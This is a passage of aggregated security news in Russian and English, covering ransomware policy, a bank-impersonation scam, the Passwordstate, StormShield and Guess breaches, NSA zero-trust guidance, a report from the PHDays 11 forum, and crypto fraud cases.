Отчет FinCEN был опубликован вскоре после того, как Министерство финансов США объявило о том, что будет вводить санкции в отношении любого субъекта, который помогает операторам вымогателей отмывать свои доходы. Кроме того, ранее на этой неделе в США [завершилась двухдневная встреча](https://therecord.media/u-s- convenes-30-countries-on-ransomware-threat-without-russia-or-china) представителей 30 стран мира, на которой обсуждалась борьба с шифровальщиками. В частности, участники встречи [договорились](https://www.whitehouse.gov/briefing-room/statements- releases/2021/10/14/joint-statement-of-the-ministers-and-representatives-from- the-counter-ransomware-initiative-meeting-october-2021/) о том, что нужно бороться с криптовалютными обменниками, которые закрывают глаза на нелегальность происходящего и помогают преступникам отмывать и обналичивать прибыль.
В милицию обратилась жительница Витебска, сообщившая, что интернет-мошенники похитили с ее счетов Br7,6 тыс. Об этом корреспонденту БЕЛТА сообщили в УВД Витебского облисполкома.
Витебчанка заявила, что ей поступил телефонный звонок с иностранного номера в мессенджере. Собеседник представился работником банка и в телефонном разговоре сообщил потерпевшей, что по ее карт-счету проходят незаконные операции. Злоумышленник убедил потерпевшую установить на ее смартфон мобильное приложение, которое предоставляет удаленный доступ к гаджету. Далее неизвестный, используя несанкционированный доступ к компьютерной информации и полученные в ходе телефонного разговора данные банковской платежной карты жительницы областного центра, совершил хищение денежных средств с карт-счета в сумме Br7,6 тыс.
Установлено, что преступление совершили жители Минска и Полоцка.
Подозреваемые задержаны.
Налоговая служба США (IRS) ищет специалистов, чтобы обучить сотрудников ведомства взлому аппаратных кошельков для криптовалют.
В опубликованном на сайте ведомства документе отмечается, что аппаратные кошельки представляют проблему для следственных действий. Следователи не могут получить криптоактивы, хранимые на таких устройствах, не могут узнать объем или даже наличие таких активов. Если в распоряжение ведомства попадают аппаратные кошельки, они не помогают в «расследовании движения цифровых валют», а также предотвращают конфискацию криптовалют.
«Децентрализация и анонимность, обеспечиваемые криптовалютами, создали целую среду для хранения и обмена чего-то ценностями за пределами компетенции правоохранительных и регуляторных ведомств. И часть этих средств, все так же недоступных ведомствам, хранятся на криптовалютных кошельках. Это миллиарды долларов», ― пишет IRS.
При этом ведомство надеется получить возможность не единовременного взлома определенного кошелька, а целое решение по взлому конфискованных устройств. Впрочем, как считает специалист по компьютерной безопасности Эндрю Тирни (Andrew Tierney), это достаточно сложная задача. Аппаратные кошельки «стали весьма безопасны». Возможно, получится взломать некоторые из моделей, но полноценное решение создать будет крайне сложно.
«И еще одно ― кошельки хранят лишь ключи для доступа к криптовалютам. И если владелец знает о попытке взлома, если у него есть сохраненные ключи где-либо еще, то он может с легкостью переместить активы», ― заключил Тирни.
• Source: https://feedback.gsa.gov/WRQualtricsSurveyEngine/File.php?F=F_3oO5cwpbxHlGByo&download=1
На днях австралийская компания Click Studios, стоящая за разработкой менеджера паролей Passwordstate, уведомила своих клиентов о взломе.
Фото: Niebezpiecznik
Passwordstate — локальное решение для управления паролями, которым, согласно официальной статистике разработчиков, пользуются более 370 000 ИБ- и ИТ- специалистов в 29 000 компаниях по всему миру.
В письме, которое получили все компании-клиенты Passwordstate, сообщается, что инцидент произошел между 20 и 22 апреля 2021 года. Компания пострадала от атаки на цепочку поставок: злоумышленники распространили среди пользователей Passwordstate вредоносное обновление и в итоге заразили машины малварью Moserware.
«Любое обновление на месте, выполненное между 20 апреля 8:33 PM UTC и 22 апреля 0:30 AM UTC, могло привести к загрузке измененного файла Passwordstate_ipgrade.zip [..], полученного из CDN-сети, не контролируемой Click Studios», — говорят в компании.
Click to expand...
Упомянутый архив Passwordstate_upgrade.zip содержал файл DLL с (moserware.secretsplitter.dll), который после установки принимался пинговать удаленный C&C-сервер преступников, запрашивая новые команды и получать дополнительные пейлоады.

Как сообщают специалисты Click Studios (1, 2), малварь успела передать на сервер преступников следующие данные пользователей: имя компьютера, имя пользователя, имя домена, имя текущего процесса, идентификатор текущего процесса, имя и идентификатор всех запущенных процессов, имена всех запущенных служб, отображаемое имя и статус, адрес прокси-сервера Passwordstate, имя пользователя и пароль.
То есть хранилище паролей Passwordstate было скомпрометировано, и разработчики пишут, что обычно в таблице паролей содержатся хедер, имя пользователя, описание, GenericField1, GenericField2, GenericField3, примечания, URL и сам пароль.
При этом специалисты компании SentinelOne, предупреждают, что злоумышленникам свободно доступны инструменты, которые помогут им расшифровать хранилища Passwordstate и восстановить пароли жертв.
Click Studios уже подготовила пакет исправлений (ZIP), который поможет клиентам удалить малварь Moserware со своих машин. Хотя точное количество пострадавших пока неизвестно, всем клиентам компании рекомендуется как можно быстрее поменять все пароли, которые хранились в скомпрометированном Passwordstate; сменить все учетные данные для внутренней инфраструктуры компании; сбросить все прочие логины и пароли.
Источник: xakep.ru/2021/04/26/passwordstate/
Французская ИБ-компания StormShield, поставщик услуг и устройств сетевой безопасности для правительства Франции, сообщила о взломе. Неизвестный хакер получил доступ к одному из порталов поддержки компании и похитил оттуда информацию о некоторых клиентах (личные и технические данные).
Также в компании предупреждают, что злоумышленник сумел украсть часть исходного кода брандмауэра Stormshield Network Security (SNS), сертифицированного для применения во французских правительственных сетях.
Расследование случившегося уже ведется совместно со специалистами Национального агентства Франции по безопасности информационных систем (ANSSI), которые оценивают возможное влияние взлома на государственные системы. В собственном пресс-релизе ANSSI сообщается, что продукты StormShield SNS и SNI находятся «под наблюдением» на время расследования.
Также заявление компании гласит, что пока не было обнаружено никаких доказательств компрометации работающих продуктов StormShield, а также каких- либо изменений, внесенных в исходный код.
Специалисты StormShield уверяют, что уже предприняли все возможные меры для предотвращения других атак (на тот случай, если у злоумышленников остался доступ к другим частям инфраструктуры). Кроме того, были заменены цифровые сертификаты, используемые для подписи обновлений SNS.
В качестве еще одной меры предосторожности компания сбрасывает все пароли для взломанного сайта технической поддержки и портала Stormshield Institute, используемого для обучения клиентов (этот сайт не пострадал, но пароли сбросят в качестве превентивной меры).
Представители StormShield сообщили СМИ, что в результате атаки пострадали лишь около 2% учетных записей клиентов, то есть примерно 200 учетных записей более чем из 10 000. Все пострадавшие уже оповещены о случившемся.
Источник: xakep.ru/2021/02/05/stormshield/
Американская компания Guess, бренд одежды и аксессуаров, разослала ряду
покупателей уведомления о взломе, который имел место в феврале и привёл к
краже данных. В настоящее время Guess сотрудничает с правоохранителями,
расследующими этот инцидент.
«Мы привлекли компанию, занимающуюся сетевой криминалистикой, для расследования киберинцидента, в ходе которого злоумышленникам удалось получить доступ к системам Guess. По нашим данным, это произошло в период между 2 и 23 февраля 2021 года», — гласят письма Guess.
«26 мая 2021 года расследование показало, что атакующие смогли добраться до персональных данных отдельных клиентов».
Производитель модной одежды собрал адреса всех затронутых пользователей после тщательной проверки документов, хранившихся во взломанных системах. Потенциальным жертвам киберпреступников предложили год бесплатного кредитного мониторинга.
Чуть позже стало известно, что помимо персональных данных, злоумышленники могли добраться и до финансовой информации. Сама Guess отмечает наличие в утечке номеров социального страхования, водительских удостоверений, паспортов и банковских счетов.
Точное количество затронутых клиентов американская компания не назвала, однако от прокуроров поступили сведения о 1300 пользователей, пострадавших из-за февральской кибератаки. Больше всего удручает, что в руки злоумышленников могли попасть номера банковских карт вместе с кодами безопасности, паролями и PIN.
Guess не уточняет, кто именно стоял за атакой, однако известно, что на сайте операторов программы-вымогателя DarkSide американский производитель одежды числился в списке жертв. Преступники утверждали, что им удалось украсть более 200 ГБ файлов, после чего они зашифровали системы Guess.
Source: https://www.anti-malware.ru/news/2021-07-13-111332/36386
The National Security Agency (NSA) and Microsoft are advocating for the Zero Trust security model as a more efficient way for enterprises to defend against today’s increasingly sophisticated threats.
The concept has been around for a while and centers on the assumption that an intruder may already be on the network, so local devices and connections should never be trusted implicitly and verification is always necessary.
Cybersecurity companies have pushed the zero-trust network model for years, as
a transition from the traditional security design that considered only
external threats.
The model was created in 2010 by John Kindervag, who also coined the term
"zero trust," principal analyst at Forrester Research at the time but talks
about it had started in early 2000s. Google implemented zero-trust security
concepts following Operation
Aurora in
2009 for an internal project that became
BeyondCorp.
The recent SolarWinds supply-chain attack, also attributed to a nation-state actor, renewed the discussion on the benefits of the zero trust security architecture for sensitive networks.
Microsoft President Brad Smith advocated for the zero-trust model in his U.S. Senate testimony regarding the SolarWinds cyberattack, saying that this concept is the best approach for an organization or agency to ensure the security of identity in their networks.
Talking about the security of U.S. government networks targeted by the attack, Smith said:
"Basic cyber hygiene and security best practices were not in place with the
regularity and discipline we would expect of federal customers with the
agencies’ security profiles. In most cases, multi-factor authentication, least
privileged access, and the other requirements to establish a “zero trust”
environment were not in place. Our experience and data strongly suggest that
had these steps been in place, the attacker would have had only limited
success in compromising valuable data even after gaining access to agency
environments" - Brad Smith, Microsoft President
Now, both the NSA and Microsoft are recommending the zero-trust security model
for critical networks (National Security Systems, Department of Defense,
Defense Industrial Base) and large enterprises.
The guiding principles for this concept are constant verification of user authentication or authorization, the least privileged access, and segmented access based on network, user, device, and app.
source:
Microsoft
The above [diagram](https://www.microsoft.com/en-us/security/business/zero-
trust) from Microsoft shows how Zero Trust security with a security policy
enforcement engine can assess in real-time. The model grants access to data,
apps, infrastructure, and networks after verifying and authenticating
identities and checking that the devices are safe.
Understanding and controlling how users, processes, and devices engage with the data is the fundamental purpose of Zero Trust, the NSA explains.
Multiple data points are required to paint an accurate picture of the activity on the network, evaluate its legitimacy, and prevent a threat actor’s lateral movement.
Combining user and device data with security-relevant information such as location, time, logged behavior, can be used by the system to allow or deny access to specific assets, and the decision is logged for use in future suspicious activity analytics. This process applies to every individual access request to a sensitive resource.
Building a mature zero-trust environment, though, is not a task done overnight but a gradual transition that often requires additional capabilities as it does not address new adversary tools, tactics, or techniques.
“Zero Trust embeds comprehensive security monitoring; granular risk-based
access controls; and system security automation in a coordinated manner
throughout all aspects of the infrastructure in order to focus on protecting
critical assets (data) in real-time within a dynamic threat environment” -
National Security Agency
The good news is that the transition can be incremental and reduces risk at
each step, drastically improving visibility and automated responses over time.
National
Security Agency
To show the benefits of a Zero Trust network, the NSA gives three examples based on real cybersecurity incidents where the threat actor would have been unsuccessful if the concept had been implemented.
In the first one, the actor accessed a victim organization’s network from an unauthorized device using legitimate credentials stolen from an employee - a level of authentication that is sufficient in a traditional security environment.
The second example features a malicious party that is either an insider threat or an actor that compromised “a user’s device through an Internet-based mobile code exploit.”
In a typical environment, the actor can enumerate the network, escalate privileges, and move laterally on the network to achieve persistence or find valuable data and systems.
National Security Agency
The third example from the NSA is that of a supply-chain attack, where the
actor adds malicious code to “a popular enterprise network device or
application” that the victim organization maintains and updates regularly
following best practices.
Under a Zero Trust architecture, the compromised device or app would not be able to communicate with the threat actor because it would not be trusted by default.
“Its privileges and access to data would be tightly controlled, minimized, and
monitored; segmentation (macro and micro) would be enforced by policy; and
analytics would be used to monitor for anomalous activity. In addition, while
the device may be able to download signed application updates(malicious or
not), the device’s allowed network connections under a Zero Trust design would
employ a deny-by-default security policy, so any attempt to connect to other
remote addresses for command and control would likely be blocked“ National
Security Agency (NSA)
The agency recognizes that besides the technical challenges arising from re-
engineering an existing information system based on the Zero Trust model,
resistance throughout the organization may be another hurdle that reduces the
effectiveness of the system.
Users, administrators, and top management should all embrace the same mindset for Zero Trust to work. That is, leaders should spend the resources to build and maintain it, network admins and defenders should have the necessary expertise, and users should not be able to circumvent policies.
“Once even basic or intermediate Zero Trust capabilities are integrated into a network, follow-through is necessary to mature the implementation and achieve full benefits,” the NSA says.
The agency is now working with DoD customers in setting up Zero Trust systems and coordinating activities with current NSS and DoD programs.
Additional guidance is being prepared to make Zero Trust principles easier to incorporate into enterprise networks. Organizations looking to adopt the concept can also find documentation and methodology from NIST as well as from several cybersecurity companies, some of them offering solutions for easier implementation.
Омский суд приговорил жителя Подмосковья к 8 годам и 1 месяцу колонии за разбой и вымогательство биткоинов на сумму свыше 181 млн рублей.Как установило следствие, 48-летний житель Подмосковья в августе и сентябре 2021 года находился в Омске и наблюдал за местным жителем, который владел биткоинами на сумму 181 млн рублей.
Преступник неоднократно угрожал омичу и вымогал средства. Владелец биткоинов
не поддался на угрозы и тогда преступник вместе с двумя подельниками решил
напасть на потерпевшего. В ноябре 2021 года он купил в Москве два
электрошокера и приехал в Омск. Группа наблюдала за владельцем биткоинов и в
декабре 2021 года решилась на нападение.
«В ночное время 22 декабря 2021 года обвиняемый и один из соучастников, надев
маски и вооружившись электрошокерами, проникли в дом, в котором проживала
семья из трех человек, среди которых, как предполагали злоумышленники, должен
был находиться владелец биткоинов.
Один из жителей дома смог дать отпор нападавшим, из-за чего последние сбежали с места происшествия», ― сообщили в прокуратуре региона.Отметим, что, хотя организатора преступной группы удалось задержать, его подельникам удалось скрыться и они до сих пор не пойманы. Житель Подмосковья свою вину не признал, однако суд счел его виновным.
«Суд назначил ему наказание в виде 8 лет и 1 месяца лишения свободы в исправительной колонии строгого режима, а также постановил взыскать с него в пользу трех потерпевших 180 000 рублей в качестве компенсации причиненного морального вреда», ― отмечено в пресс-релизе прокуратуры.
Груз устройств на сумму около $200 тыс. был ранее задержан немецкой таможней - партия будет уничтожена «без возврата и компенсаций».
Разработчики «тамагочи для хакеров» Flipper Zero — портативное устройство для пентестеров и гиков, который с виду напоминает игрушку. Гаджет позволяет анализировать данные в радиопотоках, эмулировать ID в системах контроля доступа, перехватывать команды пультов дистанционного управления и многое другое.
Flipper Zero поставляется с открытой прошивкой, что позволяет самостоятельно перепрограммировать устройство, устанавливать собственные прошивки и программные модули. Также доступа полная электронная схема Flipper Zero.
Flipper Zero сообщили, что отправленный через «Почту России» груз устройств на сумму около $200 тыс. был ранее задержан немецкой таможней. Об этом
Как рассказала компания в Twitter, накануне таможенная служба предоставила официальный ответ по инциденту. Согласно сообщению, задержанная партия будет уничтожена «без возврата и компенсаций».
Продукт Flipper Zero попадает под экспортные санкции ЕС, которые ограничивают доступ России к передовым технологиям — это дроны, ПО для шифрования, полупроводники и другое. Везти партию через Германию решила «Почта России». Компания пояснила, что у сервиса там находится логистический хаб.
Оставшиеся заказы разработчики Flipper Zero попробуют отправить с помощью другой схемы. Подробности не приводятся, однако компания не уверена, что данная схема сработает.
source: twitter.com/flipper_zero/status/1567194641610465281
Информационная безопасность напрямую связана с безопасностью граждан и всего государства. Об этом не раз говорилось на международном форуме по практической безопасности Positive Hack Days 11 . Живая демонстрация происходила одновременно — в ходе самой масштабной открытой кибербитвы в мире The Standoff . Мероприятия стали самыми посещаемыми в своей истории: за ними наблюдали свыше 127 тысяч зрителей онлайн, а 8700 человек посетили площадку в Москве.
В программу PHDays 11 вошло около 100 докладов, секций и круглых столов, различные конкурсы с денежными призами (например, по взлому банкомата, кассовой системы или POS-терминала), творческие фестивали Positive Wave и HackerToon, финал первого Всероссийского конкурса проектов open source для школьников и студентов, состязание по похищению произведений кибер-арта и многое другое.
Перечислим несколько инцидентов, осуществленных атакующими за четыре дня The Standoff: остановка добычи нефти (в инфраструктуре нефтегазовой компании Tube, которая занимается добычей, переработкой, хранением и сбытом нефти и газа), блокирование нефтепродуктопровода, нарушение работы сооружений для очистки сточных вод. Реализации подобных угроз в реальной жизни могла бы привести к тяжелейшим последствиям. Хакеры также довели до логического завершения свои атаки на колесо обозрения, телетрап и многие другие объекты виртуального Государства F.
Всего атакующие 63 раза реализовали недопустимые события, 30 из них были уникальными. Для сравнения: в ходе ноябрьской кибербитвы произошло лишь 6 уникальных недопустимых событий. Пострадали практически все компании, за исключением банковской системы. В систему продажи железнодорожных билетов вмешались 14 из 17 красных команд. Произошло также внедрение вредоносного кода в процесс разработки.
Победителями киберучений со стороны атакующих стала команда Codeby (27 715 баллов), на втором месте True0xA3 (23 381 балл) и на третьем — Invuls (12 352 балла). За четыре дня учений атакующие сдали 295 отчетов об уязвимостях. Около 40% всех отчетов сданы тремя командами: Codeby, DeteAct и Bulba Hackers. Наибольшее количество уязвимостей обнаружено в транспортной компании Heavy Logistics.
Команды защитников за четыре дня предоставили 287 отчетов об инцидентах и 10 отчетов о расследованиях. Больше всего отчетов сдала команда ZoneZone. Минимальное время расследования составило 1 час 13 минут, а среднее — 9 часов 15 минут.
«Каждое участие в The Standoff приносит нам полезный опыт, — дал свой комментарий представитель защитников, заместитель генерального директора и технический директор компании „Газинформсервис“ Николай Нашивочников. — Участники команды GiSCyberTeam выявляют и расследуют инциденты в условиях даже не приближенных к реальным, а с более суровыми ограничениями функциональности защиты. Сегодня масштабные кибератаки на объекты критической информационной инфраструктуры происходят практически нон-стоп. В разрезе текущей ситуации киберучения — это отличная возможность применить свои навыки и разработать возможные стратегии предотвращения атак. Предприятия и бизнес-структуры в России все чаще сталкиваются с киберугрозами, поэтому мы, как специалисты по обеспечению информационной безопасности, относимся к этому мероприятию, как к работе. Мониторинг и расследование событий ИБ — интересный, увлекательный, но все-таки труд».
Как атаковали Rutube
Ближе к вечеру второго дня PHDays 11 гости эфирной студии поделились деталями недавней атаки на видеохостинг Rutube. Александр Моисеев, заместитель генерального директора «Газпром-Медиа Холдинг» рассказал, что инфраструктура сервиса значительно пострадала, при этом пользовательские данные затронуты не были, что явно указывает на цель преступника — полное уничтожение видеоплатформы. Алексей Новиков, директор экспертного центра кибербезопасности Positive Technologies, чья команда проводит расследование инцидента, отметил, что злоумышленники использовали общедоступный инструментарий, в том числе Cobalt Strike, который применяют многие пентестеры, а также традиционные для системных администраторов инструменты. Александр Моисеев добавил, что на грядущем ПМЭФ «Газпром-Медиа Холдинг» планирует провести сессию, где подробно расскажет об инциденте с точки зрения его воздействия на пользователей.
«Команда PT ESC занимается анализом технических следов, которые оставили в инфраструктуре киберпреступники, и таким образом восстанавливает всю цепочку событий, — рассказал Алексей Новиков. — Ответ на вопрос, как была осуществлена эта атака — самый важный. Он позволит сделать так, чтобы подобные атаки не повторялись».
Как ищут информацию для расследования
Любое действие на компьютере оставляет цифровой след: человек открывал файлы, читал их, изменял, удалял, заходил в сеть, открывал порты и прочее. Об этом напомнил руководитель аналитического отдела «Атом Безопасность» Даниил Бориславский, выступая в бизнес-треке с докладом «Расследование инцидентов ИБ, совершенных сотрудниками: куда смотреть, за что хватать, чем ловить».
«Такая информация остается на компьютере, но ее очень много, — объяснил Даниил Бориславский. — Нужны инструменты поиска. Первый из них — поиск по атрибутам, который работает быстро, но ищет только „снаружи“ файлов. Второй инструмент — поиск по содержимому, то есть внутри файлов. Но этот способ долгий и не каждый файл можно открыть».
«Сегодня при расследовании инцидентов в случае поиска информации в изображениях на ПК используют OCR-технологии для перевода данных в текстовую форму. При этом все подряд анализировать нерационально, поэтому требуются словари и регулярные выражения. Еще один подход — использование нейросетей. С помощью нейросетей, например, мы смогли отсортировать и найти в сети сканы паспортов», — отметил Даниил Бориславский.
В банках создаются антикризисные группы реагирования
В эфирной студии форума также обсудили значение кибербезопасности для топ- менеджмента финансовой отрасли.
Роман Чаплыгин, директор направления по развитию бизнес-консалтинга Рositive Тechnologies, рассказал о создании в компаниях целых антикризисных групп реагирования на киберинциденты, в состав которых могут входить не только руководители, но и обычные сотрудники, обладающие рядом ценных компетенций.
«Если раньше тема кибербезопасности у топ-менеджмента финсектора была в самом низу списка важных дел, то сейчас высшее руководство собирается и вникает в суть проблемы в моменте: создаются антикризисные комитеты, срочно выясняется, что атакуют в компаниях и как это сказывается на положении дел», — заявил Роман Чаплыгин.
Независимый эксперт Павел Климович обратил внимание, что топ-менеджмент банков стал фокусироваться на реальных угрозах. До 2022 года список таких угроз доходил до сотни. Сейчас во многих компаниях запущен процесс переоценки реальных рисков — фокус смещается на то, что действительно важно.
Искусственный интеллект нам поможет
Возможности и задачи искусственного интеллекта обсуждали в эфирной студии форума специалист отдела перспективных технологий Positive Technologies Игорь Пестрецов и преподаватель DataGym, практик со стажем и обладатель статуса Kaggle Grandmaster Михаил Трофимов. Эксперты рассказали о применении искусственного интеллекта в разных областях жизни, в том числе в ИБ, о количественном росте использования нейросетей в будущем и о трансформации многих популярных профессий.
«Искусственный интеллект очень скоро серьезно поможет ИБ снять когнитивную нагрузку со специалистов, чтобы те смогли сконцентрироваться на действительно важных проблемах, а не на рутине», — считает Игорь Пестрецов.
«Будут развиваться модели искусственного интеллекта общего назначения, каждую из которых можно будет обучить один раз и использовать ее знания в разных задачах. Возникнет много разных приложений в самых неожиданных сферах, где такие модели будут сразу давать хороший результат. Поэтому я ожидаю скорее не качественный, а количественный рост применения искусственного интеллекта», — считает Михаил Трофимов.
Эффективное взаимодействие SOAR и SIEM для построения SOC
С февраля количество инцидентов ИБ значительно увеличилось, возросла нагрузка на SOC. Анжелика Свойкина, пресейл-инженер компании Security Vision, рассказала об использовании SOAR-систем для закрытия инцидентов ИБ.
«SIEM зачастую выдает десятки миллионов инцидентов в день. По сравнению с первым кварталом 2021 года количество инцидентов увеличилось более чем в четыре раза. Несмотря на это, доля умных и сложных атак уменьшилась: многие рядовые пользователи подключаются к ботнетам или пользуются инструкциями в телеграм-каналах атакующих. Кроме того, если раньше продолжительность атак измерялась минутами, то после февраля средняя продолжительность увеличилась до нескольких часов, а многие длятся несколько дней. Это все приводит к огромной нагрузке на аналитиков SOC», — отметила Анжелика Свойкина.
По ее словам, эту нагрузку можно снизить с помощью взаимодействия SIEM- и SOAR-платформ, используя тикетинг, автоматизацию рабочих процессов по закрытию инцидентов, коннекторы и так далее.
Воры под прикрытием хактивизма
В последние месяцы в России участились не только атаки со стороны хактивистов, но и атаки киберпреступников, нацеленных на финансовую выгоду, — они получили своего рода индульгенцию от мирового сообщества на взлом российских компаний. Об этом рассказал Олег Скулкин, руководитель лаборатории цифровой криминалистики и исследования вредоносного кода Group-IB.
После 01111111day изменения в ИБ происходят быстро и локально
В своем докладе главный эксперт «Лаборатории Касперского» Сергей Голованов представил данные с конца зимы этого года, полученные с помощью статистических систем Kaspersky, рассмотрел произошедшие киберинциденты и рассказал о тактиках и средствах, которыми пользовались злоумышленники.
После 23 февраля этого года в сфере информационной безопасности произошли значительные изменения. Как отметил Сергей, если во времена активного распространения COVID-19 они были постепенными и глобальными, то в этом году все случилось очень быстро и локально.
«Этот день можно увидеть в статистике системы Kaspersky Who Calls. Ни одного звонка телефонного мошенника 24 февраля не было. В дальнейшем мошеннические звонки вернулись, но до сих пор их количество еще не достигло значений начала февраля. С чем это связано? Например, 15 апреля в новостях показали логово мошенников в Бердянске, которые обманывали россиян. Можно догадаться, кто за этим стоит, — говорит Сергей Голованов. — По данным нашего поисковика по дарквебу, количество объявлений в даркнете с упоминанием российских банков в этот же день значительно уменьшается, затем их число вдруг резко растет, а на данный момент опять упало в ноль».
SOC on-premise: как построить, чтобы не было мучительно больно
Не все заказчики готовы передать SOC на аутсорс, поэтому пытаются строить подобные центры у себя. Ввиду геополитической необходимости многие компании в последние месяцы выполнили категорирование, проектирование и внедрение СОИБ и подготовились к тому, чтобы реализовывать функцию мониторинга в своей инфраструктуре и взаимодействовать с НКЦКИ. Третьим катализатором выступил первомайский Указ Президента Российской Федерации «О дополнительных мерах по обеспечению информационной безопасности Российской Федерации».
«При построении SOC в первую очередь нанимают консультанта, который поможет избежать граблей и трат на переделку. Но если такой человек уходит, компания может, по сути, остаться с чемоданом без ручки и столкнуться с проблемами дальнейшего развития SOC. Еще один опасный вариант — когда быстро и дешево. На бумаге может быть все нормально, компоненты будут присутствовать, контент внутри SIEM может существовать, но первый же пентест покажет, что SOC ничего не видит», — отметил руководитель направления центра Solar JSOC «Ростелеком- Солар» Андрей Прошин.
Облик современного ЦОД — какой он
Айрат Мустафин, генеральный директор компании Liberum Navitas, предоставляющей услуги IT-аутсорсинга, затронул тему ЦОДов завтрашнего дня, заявив, что ЦОДы выходят на новый уровень развития и последуют за банками и интернет-сайтами, которые стали экосистемами, что означает взаимодействие с обществом и человеком по большому числу направлений. «То, чем мы пользуемся сейчас, было создано давно. Это же касается и ЦОДов — многие из них расположены на бывших складах, узлах связи и в других не предназначенных для этого строениях. Даже сегодня центры обработки данных строятся из сэндвич-панелей. Кроме того, большинство ЦОДов в России построены в западной части страны, а дальше Урала их нет. В современном ЦОДе необходим как минимум высокий уровень роботизации, включая, например, перемещение серверов между стойками с помощью роботов- помощников», — рассказал Айрат Мустафин.
Особенности построения процесса управления инцидентами в MSSP-модели
Руководитель отдела исполнения Security Vision Роман Овчинников поделился принципами управления инцидентами в MSSP-модели и рассказал о вопросах построения взаимодействия с клиентами, способах оказания услуги, проблемах географически распределенных инфраструктур и особенностях отчетности. «За последнее время на MSSP-рынке было два больших этапа роста. Первый был связан с пандемией и массовым переходом на удаленную работу, а второй — с известными февральскими событиями», — отметил Роман Овчинников.
Охота на современные атаки на инфраструктуру Active Directory
Выступая в треке технических докладов, Теймур Хеирхабаров и Демьян Соколин из компании BI.ZONE признались, что планировали рассказать обо всех известных в публичном поле атаках на инфраструктуру Active Directory и сопутствующие ей сервисы в 2021–2022 годах. Но готовясь к докладу, они поняли, что в час не уложатся. Поэтому в своем выступлении эксперты решили сосредоточиться на атаках на так называемую службу сертификации Active Directory и рассмотрели наиболее интересные и эффективные техники из арсенала злоумышленников с позиции blue team и SOC. Они также рассказали, как можно выявлять эти техники по штатным логам Windows и какие правила корреляции могут быть созданы в SIEM- системе.
Эксперты отметили, что инфраструктура Active Directory и связанные с ней сервисы сегодня являются неотъемлемой частью практически любой корпоративной сети. А Active Directory, как один из ключевых элементов инфраструктуры, — лакомый кусочек для злоумышленников. Максимальные привилегии, полученные в домене, распахивают перед атакующими «двери» в инфраструктуру либо — если «двери» не интегрированы с Active Directory — упрощают их открытие.
«С точки зрения настроек Microsoft CA services — это просто ад, — признался Теймур Хеирхабаров. — Конечно, если их правильно настраивать, а не делать по принципу „далее, далее, окей и в продакшен“. Это сложная комплексная система с множеством параметров, неправильная конфигурация которых может привести к полной компрометации домена».
Опять про безопасную разработку
О том, что такое безопасная разработка в ИБ и почему это важно, поговорили руководитель направления по развитию продуктов для DevSecOps Positive Technologies Алексей Жуков, заместитель руководителя центра программных решений НСПК Алексей Бабенко и руководитель отдела исследований и разработки анализаторов кода Positive Technologies Владимир Кочетков.
Участники рассказали о своем видении безопасной разработки в ИБ и о том, что нужно делать, чтобы привить разработчикам умение писать код без ошибок.
«Безопасность приложения должна обеспечиваться начиная с планирования архитектуры и заканчивая деплоем. Такая концепция подразумевает, что на всех этапах разработки продукт должен быть безопасным», — считает Владимир Кочетков.
Алексей Жуков отметил важность диалога с разработчиками и необходимость мотивировать их писать безопасный код.
«Нужно заинтересовать людей писать код без ошибок. Мотивации разработчиков могут быть разные — от повышения зарплаты до заинтересованности в повышении своей стоимости на рынке труда. Нематериальные меры поощрения также важны», — отметил Алексей Жуков.
Алексей Бабенко отметил, что известный скепсис разработчиков в отношении безопасников уйдет, когда безопасность станет частью разработки.
Bug bounty: взгляд разработчиков, пользователей, хакеров
Участники круглого стола обсудили развитие российских платформ bug bounty, в том числе The Standoff 365 Bug Bounty : проблемы запуска, определения вознаграждения хакеров, бюджета на поиск и устранение уязвимостей, а также перспективы этого рынка. Кстати, за первые два дня работы платформы The Standoff 365 Bug Bounty на ней зарегистрировались 250 белых хакеров. Первыми на ней разместили свои программы «Азбука вкуса» и Positive Technologies.
Ярослав Бабин, директор The Standoff 365, рассказал о переосмыслении подхода к bug bounty на новой платформе: «Импакт заказчику не всегда понятен, а хакер может добиться большего, чем вы могли предполагать. Мы предлагаем платить хакеру не просто за какие-то уязвимости, а за сбор уязвимостей в цепочку и последовательность».
Директор блока экспертных сервисов BI.ZONE Евгений Волошин считает, что bug bounty в России сегодня — это мейнстрим. «Сегодня почти одновременно стартуют сразу три платформы. Это уже требование рынка и необходимость. У больших платформ есть свои проблемы, своя история, а мы не отягощены каким-то наследием, у нас есть возможность сделать все классно с самого начала», — сказал Евгений.
Владимир Бенгин, директор департамента обеспечения кибербезопасности Минцифры, уверен, что с помощью экспертов можно устранить проблемы развития платформ bug bounty в России: «В Минцифры слышали мнение о том, что bug bounty можно трактовать как некую серую зону. Мы ждем, что эксперты и те, у кого уже есть опыт в этой сфере, скажут, как они видят решение этой проблемы. Если нужно принять какие-то законы или иные меры — мы открыты».
Тему bug bounty и появление новой платформы The Standoff 365 Bug Bounty также обсудил Владимир Заполянский со своими гостями в эфирной студии PHDays 11.
«Мы — агрегатор между бизнесом и хакерами, — рассказал Ярослав Бабин, директор продукта The Standoff 365. — Наша задача — привлечь и тех и других. Наши отношения с хакерским сообществом всегда были хорошими. У нас есть форум PHDays, киберучения The Standoff. Мы еще не успели запуститься, а на платформе уже зарегистрировались 366 хакеров. С исследователями проблем не будет, комьюнити будет расти».
Технический директор «Азбуки вкуса» Дмитрий Кузеванов считает, что до запуска Bug Bounty от Positive Technologies на российском рынке просто не существовало достойной платформы, потому что необходимо доверие со стороны компаний и хакеров. «Сейчас появилась новая платформа, и мы с радостью к ней присоединились. Нас привлекает репутация, трафик хакеров и уверенность. Позитиву в этом можно доверять», — отметил спикер.
Напоминаем, что бессменный организатор PHDays и The Standoff — компания Positive Technologies. Соорганизатором третий раз подряд стала группа компаний Innostage . Эксперты Innostage берут на себя задачу по развертыванию инфраструктуры полигона и его поддержке. Специалисты центра предотвращения киберугроз CyberART ведут мониторинг противостояния, контролируют действия команд, выступают менторами одной из команд защитников и демонстрируют гостям форума цепочки реализованных атак.
• Source: https://www.securitylab.ru/news/531781.php
• Source: https://www.phdays.com/ru/
• Source: https://standoff365.com/
По результатам расследования итальянской налоговой полиции совместно с прокуратурой провинции Южный Тироль 14 человек, связанных с пирамидой OneCoin, обвинены в мошенничестве при отягчающих обстоятельствах. Об этом сообщают местные СМИ.
Следствие установило, что трое братьев из Южного Тироля, проживающие за границей, совместно с основательницей пирамиды Руджей Игнатовой организовали мошеннический сбор средств на территории Италии. К незаконной деятельности они привлекли десять промоутеров.
По версии правоохранителей, через местные банки в пользу OneCoin прошли транзакции на общую сумму около €11 млн ($12,9 млн). Примерно €5 млн ($5,8 млн) из этой суммы промоутеры собрали у 3700 жителей Южного Тироля.
